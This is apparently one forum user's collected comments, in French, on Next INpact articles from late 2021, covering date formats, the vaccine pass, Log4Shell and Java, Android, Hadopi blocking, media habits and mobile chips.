-> Tu arrives à des cas où si tu relis la date en BDD, elle est différente de la date relue de l’OS. Donc il faut systématiquement arrondir à la seconde. Donc opérations en plus à chaque lecture à ne pas oublier.
Sans parler de l’étape de restitution en HTML/Javascript qui a encore un codage et stockage différents…
Les problèmes les plus touchy que je connaisse en informatique de gestion/web:
Les algos, le système, c’est complexe mais facile car “prouvable” (et généralement assez déterministe). Le reste ça paraît simple mais c’est hyper fragile.
Le 03/01/2022 à 13h 33
Bien malin celui qui peut dire quel format est utilisé dans tous les endroits du système.
Exemples:
Le 03/01/2022 à 10h 21
Pfff, toujours à râler. Le mec il a ultra optimisé son format de date pour être géré super rapidement et on se plaint …
Jamais contents les utilisateurs…
Des radars de bruit testés dans plusieurs communes françaises
04/01/2022
Le 04/01/2022 à 14h 32
C’est le seul moyen que le scooter dépasse le 90 en pointe :)
Next INpact et INpact Hardware vous souhaitent une bonne année 2022 !
01/01/2022
Le 02/01/2022 à 15h 59
Bon, on va pas s’emballer, jamais 2 sans 3, donc pour l’instant: bonne soirée :)
Le passe sanitaire devient passe vaccinal : télécharger le projet de loi
22/12/2021
Le 23/12/2021 à 08h 24
“Faut pas prendre les cons pour des gens 3” est sorti. Je l’ai, et j’ai ma carte de con. Enfin un peu de reconnaissance dans ce monde.
Le 22/12/2021 à 16h 04
Et on fait pareil avec ceux qui fument, qui ne font pas de sport, qui ont des antécédent cardiovasculaires ou de cancer de la famille: pourquoi les soigner?
Franchement, accepter un pass vaccinal pour éviter de vivre dans un pays qui choisit qui doit vivre ou mourrir physiquement, ça me va.
Des vaccins obligatoires, on en a déjà.
Le 22/12/2021 à 16h 02
Même réponse: là on ne psychote pas sur une simili grippe, mais sur le fait que les soignants sont à bout, que le système de santé se bloque.
Le 22/12/2021 à 16h 00
Et qui sature notre système de santé, tu l’oublies. C’est ce qui me préoccupe le plus actuellement.
La majorité survit, mais les soignants travaillent dans un rush permanent depuis 2 ans…
Sinon, je vois que tu n’as pas d’exemple de pas de bol: les gens jeunes, sans comorbidité, non morts mais avec des séquelles depuis des mois suite à une intubation…
Le 22/12/2021 à 14h 57
0,08*0,26% de chances, je classe cela tout court. Si je devais me soucier de ne pas faire ce qui pourrait mal tourner dans 0,02% des cas, je ne conduirais pas, je ne monterais pas d’escalier, ne cuisinerais pas et ne remettrais pas de bûche dans la cheminée.
Si les gens arrêtaient de psychoter sur le vaccin, s’ils respectaient tranquillement les gestes barrières, on n’aurait peut-être pas besoin de ce genre de lois.
Comme chacun prend ses aises avec les conseils en considérant que ça ne le concerne pas, l’état est bien obligé d’intervenir.
La vraie question est: quand ça va finir, qui va avoir l’honneur de déclarer cette “crise” terminée?
Et comment détricoter tout cela quand ce ne sera plus une crise, mais le nouveau mode de vie (je veux dire le virus)?
Le CSA somme 5 sites pornos de bloquer les mineurs, mais sans donner de lignes directrices
21/12/2021
Le 22/12/2021 à 10h 59
Merci. C’est juste se mettre en conformité avec la loi, ou sinon…
Ben j’espère bien qu’on va trouver comment la faire appliquer. Sans pour autant sortir tout l’arsenal de la Chine.
Il y a trop de lois en France qui ne sont pas appliquées et on continue d’en sortir pour les compléter…
Log4shell : les jours d’après
21/12/2021
Le 22/12/2021 à 10h 33
Ca c’st le vieux monde. Le nouveau monde c’est:
“Nous utilisons des technologies opensource mais nous sommes incapable d’installer notre soft, nous fournissons du SAAS ou des VM. Nous sommes incapables de patcher les couches basses car nous n’avons plus les (la) ressources qui ont créé la base du logiciel. Mais on est opensource!!!”
Après, le truc c’est que avec un peu de sécu (genre: aucun serveur ne peut initier une communication vers l’extérieur), on a un peu de temps pour patcher.
Tu n’es donc pas un programmeur.
La mauvaise image de Java vient:
Là où Java à imposé une vision plus moderne du dev:
Java a des défauts, mais alors dire qu’il est lent à l’époque Python, Javascript, et après la période PHP pré-7 (à partir du 7, les optimisations PHP sous la pression de FB ont permis de diminuer le nombre de serveurs, souvent en divisant par 2 leur nombre), c’est mal connaître l’outil.
Après, il reste LE problème: quand Java c’était SUN, on avait une certaine confiance dans son avenir gratuit, quand c’est devenu ORACLE, on l’a pas mal perdue…
La justice administrative refuse de suspendre le déréférencement de Wish.com
20/12/2021
Le 20/12/2021 à 12h 48
Il est bien temps d’appliquer la loi plutôt que d’en pondre de nouvelles encore plus difficiles à appliquer…
Voici Android 12 (Go edition)
15/12/2021
Le 17/12/2021 à 08h 23
Oui et non: entre les téléphones de la maison et ceux sur lesquels on me demande conseil, j’a très rarement vu un Android “vif”. Il y a toujours des lourdeurs, des temps d’attente, qu’ils aient 1 ou 6Go de RAM.
L’ouverture des mails est longue, le lancement de youtube est long, celui des contacts/tel/sms est long, il y a des temps d’attente avant que le clavier ne s’affiche ou qu’il ne soit réactif. Alors OK, je n’ai pas il me semble touché un android > 10.
Après, là où je suis d’accord c’est que je parle d’androids “classiques”, donc avec toute la plate-forme Google qui fait certainement partie de la lourdeur générale. Et je ne vois pas souvent de samsung et je n’ai jamais touché de Sony (bien que j’ai souvent souhaité m’en acheter un)
Par ailleurs, j’imagine que “l’embonpoint” des applis est une pièce du puzzle, ainsi que la vitesse de la flash interne pour la relecture et les perfs réseau. Android recharge tellement régulièrement les données plutôt que de les garder en RAM…
Le 16/12/2021 à 08h 40
En 2021, le “dans le doute tu reboot”: ça montre à quel point Google n’a pas su faire mieux que Ms dans le domaines des OS, même moins bien en fait…
Android continue à “améliorer” l’interface, mais le fond est assez mauvais et dépassé. Google le rustine pour le rendre “moderne”, mais dans le fond ce n’est pas un OS moderne. Comment justifier qu’un téléphone quadri/octa core avec 4/6Go de RAM mette autant de temps à démarrer? Un PC complet met entre 10 et 30s à démarrer de 0, un téléphone met près d’une minute pour être “démarré” et encore plus pour être utilisable.
La partie téléphone/SMS, qui devrait être ultra snappy, a une certaine latence au chargement sur de nombreux tel.
Si je reprends mon Windows Phone, il est bien plus utilisable et agréable en tel/SMS que n’importe quel android que j’ai vu.
Le 15/12/2021 à 14h 10
Quand elle fonctionne. Elle me réactive les “fonctionnalités de chat” qui font que les messages ne passent pas toujours :(
Certains se plaignent de Windows. Moi je me plains d’Androïd, pas fichu d’afficher des SMS sans devoir recharger l’appli sur un téléphone qui a 4Go de RAM… La pire archi du monde…
Cinq sites pornos mis en demeure par le CSA : contrôle d’âge ou blocage !
14/12/2021
Le 15/12/2021 à 12h 47
?
Le 15/12/2021 à 08h 23
On demande juste aux site de se rendre conforme à la loi. Ils n’ont qu’à le faire, où est le problème?
Indice de réparabilité : l’UFC-Que Choisir « tire la sonnette d’alarme »
14/12/2021
Le 15/12/2021 à 08h 29
C’est l’indice de réparabilité, ça ne concerne pas vraiment Amazon qui travaille l’indice de remplacement total
Une première bande-annonce pour Les Animaux Fantastiques : Les Secrets de Dumbledore
14/12/2021
Le 15/12/2021 à 08h 28
Après le 2 qui était franchement brouillon, et le côté “on va intégrer un perso de Harry Potter au forceps pour ramener du public”, pas sûr d’avoir envie de le voir. Le 1 était bien, le 2 on avait l’impression qu’ils essayaient de tordre l’histoire pour faire rentrer du Harry Potter carré dans un trou presque rond, tout en balançant la sauce “ambiance noire/malaisante” et un bon gros nappage d’effets spéciaux…
Ca m’a fait l’impression de “je vous remets un peu de chocolat sur votre raclette à la crème?”
FreeboxOS passe à la version 4.54
14/12/2021
Le 15/12/2021 à 08h 20
Les freeze concernent à peu près tous les utilisateurs autour de moi, quelque soit l’utilisation et quelque soit la box et la techno (fibre ou ADSL): TV, netflix, JV, téléchargement, téléphonie (plus de son pendant plusieurs secondes/dizaines de secondes), et même surf (pages introuvables)
Ca varie entre plusieurs fois par jour et plusieurs fois par heure, depuis au moins un mois. Aucune comm de free. Seule solution actuellement: quitter free.
Log4Shell : derrière l’importante faille, l’éternelle question du soutien au logiciel libre
13/12/2021
Le 13/12/2021 à 09h 40
OK, merci. Bon, il faut quand même que le serveur ait accès à tout et n’importe quoi (ici même les serveurs web n’ont pas accès au web en sortie)
Le 13/12/2021 à 09h 19
“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled”
Donc il faut que l’attaquant ait accès au LDAP et ait intégré dans le LDAP une charge de travail? En binaire?
Après, je suis tout à fait d’accord sur le problème de la multiplication des frameworks - normalement, je fais une chouche d’abstraction entre mon soft et le framework afin de:
L’avenir du Web version Hadopi ? Un blocage à tous les étages
07/12/2021
Le 10/12/2021 à 10h 27
Il y a plus de créativité que dans certains trucs qui passent à la radio :)
Et un potentiel à rester dans la tête toute la journée… D’ailleurs, il faut que je soumette cette idée: détecter ceux qui se passent des chansons/musique dans la tête et n’en payent pas les droits :)
Le 08/12/2021 à 11h 48
C’est ce principe que je ne comprends pas. Il y a un système, il est lent à faire bouger, mais si on ne lui donne pas sas chance on ne peut pas dire qu’il a des défauts.
C’est comme traverser au rouge sur un passage piéton “parce qu’il n’y a jamais de voiture”. Ou rouler à 130 au lieu de 110 parce ce qu’ILS font chier.
Ceux qui téléchargent à gogo, pourquoi se plaignent-ils d’un organe qu’ils légitiment?
Non, tu as le choix, comme on a le choix de payer Netflix ou Disney, ou le choix de cultiver chez soi ou même le choix d’aller prendre directement dans les champs. Mais si on va prendre dans les champs, on ne va pas se plaindre en disant “mais ça ne se voit pas” quand même???
Le 08/12/2021 à 08h 28
Merci, j’utilise toujours celle de l’université de Toulouse - mais elle est parfois très incomplète.
http://dsi.ut-capitole.fr/blacklists/download/blacklists_for_pfsense.tar.gz
Le 08/12/2021 à 08h 24
Oui, tout n’est pas excellent :)
Mais pas grand chose sur les plate-forme de musique ne me plaît, on nous rabâche pas mal de musiques reprises, simpliste, sans expression artistique, limite une IA de base pourrait la générer.
En général 22 épisodes par saison, qui correspond en gros à une diffusion de 1 épisodes toutes les 2 semaines - moins la période estivale.
Même à 20min/épisodes, ça te fait 7h par série par an. Donc une à deux séries par an, plus un film toutes les deux semaines, je comprends, mais plus…
Sauf que j’ai des enfants, donc on regarde forcément ensemble (règle de base de la famille: personne ne s’isole pour regarder un truc ou jouer ou être sur son téléphone) et on a beaucoup d’activité annexes.
Par contre, je constate que mes enfants regardent la TV pour se divertir, pas juste pour être en mode patate de canapé, bref ils ont un certain esprit critique qui me plaît
On a pu regarder “Good Omens” sur Amazon Prime, 6x50min, ça a été très galère à caser dans le planning :) (d’ailleurs, au cas où il disparaîtrait, je l’ai acheté)
Il y a un certain égocentrisme dans les gens qui sont très consommateurs de JV et Netflix, avec le tout/tout de suite/maintenant/et on me le doit, qui me semble casser une construction de base dans le plaisir, liée à l’attente, à la recherche du moyen d’obtenir… J’ai grandi avec les VHS, et Madmovies pour savoir que regarder -> beaucoup de mes films préférés le sont à cause de la “quête” pour les trouver.
Et comme je suis dans l’informatique, par acquis de conscience, comme je gagne ma vie en faisant des logiciels, je ne pirate pas de contenu ou de logiciel.
Le 07/12/2021 à 20h 42
Merci pour les suggestions :)
Bon, certains m’ont déçus (notamment death note - peu d’intérêt, pas de vraie construction “d’énigme”, bref, pas mon style)
Gunnm lui-même à sa sortie m’avait ennuyé sur certains tome qui sont des fillers. Je les ai passés à toute vitesse.
Merci aussi. Je n’achète/lit/regarde rien qui ne soit pas déjà fini (et en général, si plus de 3 saisons -> je ne regarde pas ou en accéléré avec la liste des épisodes clés)
Beaucoup de séries (manga, BD, série TV, jeux) ont une bonne idée de départ, un bon twist à un moment, mais souvent pour des raisons commerciales les créateurs/producteurs ne savent pas s’arrêter/garder l’esprit/le rythme.
C’est extrêmement difficile de trouver quelque chose d’intéressant, mais au lieu de chercher à tout regarder, je préfère “l’ancienne” méthode: lire les revues.
Et je suis très patient, je peux attendre longtemps pour être sûr de vouloir acheter quelque chose (d’où je n’ai jamais vu la fin du seigneur des anneaux par exemple).
Mais si ça vaut le coût, je veux le posséder (quitte à le racheter quand il s’abîme: j’ai acheté 3 fois monkey island, 2 fois blade runner, 2 fois le livre “la toile entre les mondes” - ce qui pour le dernier est une forme de quête pour le trouver). J’ai acheté les DVD de Daria, ceux de Pushing daisies (aucun des deux n’est au complet en France voire en Europe), et je suis en train d’acheter les DVD de “The Middle” (là il faut courir après les versions).
Je n’ai pas de MP3, juste ceux de mes CD (plus de 300) - mais le matin en me levant, je sais ce que je veux écouter, et je dépense régulièrement 10-60€ en CD avec ma liste d’achats à faire (beaucoup en occasion, car plus dispos en neuf)
Bref, je ne suis pas client hadopi du tout… Ce qui ne m’empêche pas de trouver son principe un peu trop simpliste et rarement en phase avec la réalité.
Notamment concernant le DNS-over-HTTPS: ce sera certainement un nouveau moyen pour les GAFA de collecter nos données, mais cette fois-ci en toute discrétion. J’imagine que Android, iOS et certainement Windows vont configurer le leur par défaut à leur guise, évinçant les FAI.
Le 07/12/2021 à 17h 35
Je serais assez content d’avoir une liste à intégrer au proxy de la maison.
Ils ont trop de temps :)
Ils devraient l’occuper à gagner plus d’argent s’ils en manquent…
Enormément -> non, clairement non.
2 & 3: je ne vois de VPN quasiment que chez des ados “gogo” qui n’ont rien compris à l’intérêt et à ce que c’est. Donc j’imagine qu’une bonne pub sur les DNS devrait leur faire acheter :)
Perso, je ne vois pas où est le plaisir de se gaver de séries et de films rarement très bons (pour ne pas dire en général très moyens) et qu’on a l’impression d’avoir déjà vus.
Je ne comprends pas comment les gens peuvent regarder plusieurs séries par an.
De même pour les mangas (pour ceux que ma fille a voulu me faire lire: Moriarty, Dr stone, …) on sent le côté “il faut accrocher” puis le “il faut livrer”, comme dans les séries à la TV ou sur les plate-formes. On joue juste sur le côté “collectionneur”, il n’y a ni fin ni même scénario réel, que du coup de théâtre au bon vouloir du scénariste (et du producteur j’imagine)
Le 07/12/2021 à 16h 11
Après on consomme quoi: un, deux films par mois? On n’a pas trop le temps d’en voir plusqaund aux mangas, ils comprennent vite que c’est souvent une arnaque bien rodée: 1⁄2 arc pour ferrer le poisson, ensuite c’est bâclé et un nouveau sort. Comme les séries.
Utiliser de l’argent, ça permet de se rendre compte qu’il faut choisir et souvent être frustré. Là on apprend aux gens à ne pas être frustré…
Ben au lieu de payer 10€ par moi pour un CD, une BD, ils paieront 10€ par mois pour un DNS en plus des 10€ du vpn.
Le 07/12/2021 à 15h 41
Ils peuvent aller au musée, il y a plein d’occasion d’y aller gratuitement.
Sérieux, à quelles “oeuvres culturelles” les jeunes accèdent auxquelles elles ne pourraient pas accéder?
Par contre, leur liste noire me fait marrer. Comment tu veux faire avec un DNS over HTTPS? Comment faire avec une mutualisation des serveurs dans les clouds?
Et je sens bien la liste en IPv4. Passez en IPv6, je ne crois pas que Hadopi suive…
LDLC piraté par Ragnar Locker, la diffusion de données aurait commencé
06/12/2021
Le 06/12/2021 à 14h 24
Et même maintenant, quand on lit les contrats, ne pas utiliser e-cb fait qu’on est moins couvert en cas de subtilisation des n° de CB.
Le Wi-Fi 6E (5 945 à 6 425 MHz) est officiellement exploitable en France
06/12/2021
Le 06/12/2021 à 12h 54
C’est dépassé, on est sur du 5 et 6GHz, pas 2,4GHz comme à l’époque ;)
Le 06/12/2021 à 07h 06
Quand je vois la différence de portée en intérieur avec murs entre le 2.4 et le 5GHz, le 6GHz ça va être pour la proximité directe.
Et quels opérateurs ont des box Wifi 6E? J’ai du mal à savoir quel Wifi propose chaque opérateur…
SiFive annonce son nouveau cœur RISC-V Performance (RV64GCB) : le P650
03/12/2021
Le 03/12/2021 à 14h 56
J’utilise une maixbit (20-25€) et une longan nano (5€ à l’époque): les deux ont beaucoup de possibilités sur le papier, et beaucoup de limites en pratique (disons que j’en ai eu pour mon argent :) ) . Mais on s’amuse.
Qualcomm dévoile son Snapdragon 8 Gen 1 (ARMv9, 4 nm)
01/12/2021
Le 02/12/2021 à 19h 43
Je ne suis pas tout à fait d’accord. Les liaisons radio ont un besoin énergétique non compressible - sauf si tu es plus proche de l’antenne.
Pour les PC arm, il y a toujours le dev kit de Microsoft à 220€, mais j’ai l’impression qu’on est vraiment sur de l’équivalent mini PC atom. Je ne pense même pas que ce soit un ssd dedans.
Le 02/12/2021 à 10h 52
Je voulais juste dire que ce n’est pas le M1 qui évince les concurrents sur les portables.
Quand à Altra, comme tu le dis, c’est du marché de niche. Je ne connais pas de concurrent sur le grand public.
Bien sûr, Qualcomm a équipé le dev kit Windows ARM, mais la puce ne semble pas taillée pour être sur du PC “classique”, plutôt sur des PC bas de gamme comme les Pentium N5000 voire les anciens Atom en SOC.
Et là, le Qualcomm fait le job et sur les benches en tout cas est meilleur que ces petits Intel. Mais niveau connectivité c’est néant.
Bref, pour le moment le M1 se compare aux Intel/AMD, mais aucun concurrent ARM n’existe sur ce segment (d’ailleurs peu porteur pour le moment)
Le 02/12/2021 à 10h 42
Je pense qu’on peut toutefois douter que la 5G puisse aller à la fois vite et ne pas consommer.
Déjà que mon tel consomme nettement moins en 3G qu’en 4G, je pense que ce sera pareil pour 4G vers 5G.
Bien sûr, il faut prendre en compte le fait que la 5G téléchargera plus vite donc sera censée avoir un rapport conso/h plus intéressant.
Mais ce n’est pas gagné: qui dit plus de vitesse de téléchargement dit aussi plus de stress sur les autres puces, notamment pour le déchiffrement du flux, il est donc difficile de savoir dans quelle mesure l’augmentation va augmenter la conso globale d’une plate-forme (sans compter l’occupation CPU)
Par ailleurs, utilisant des vieux téléphones en désactivant le modem, je peux dire que le modem consomme énormément (on passe de 2-3j d’autonomie à 10 facile sur des téléphones de 2015 et 2018).
Donc je suis circonspect comme @Fuli et le rejoint: le débit 5G pourrait être bridé pour ne pas consommer trop. Notamment si on mix 5G et ancienne archi (ce qui n’est pas le cas ici heureusement pour un fer de lance).
Et même côté antennes, la 5G est soit plus énergivore que la 4G, soit moins: plus en valeur absolue, moins en théorie si on la rapporte au Go transféré - dans l’hypothèse où suffisamment de gens téléchargent suffisamment de données et qu’on oublie les périodes où personne ne se connecte…)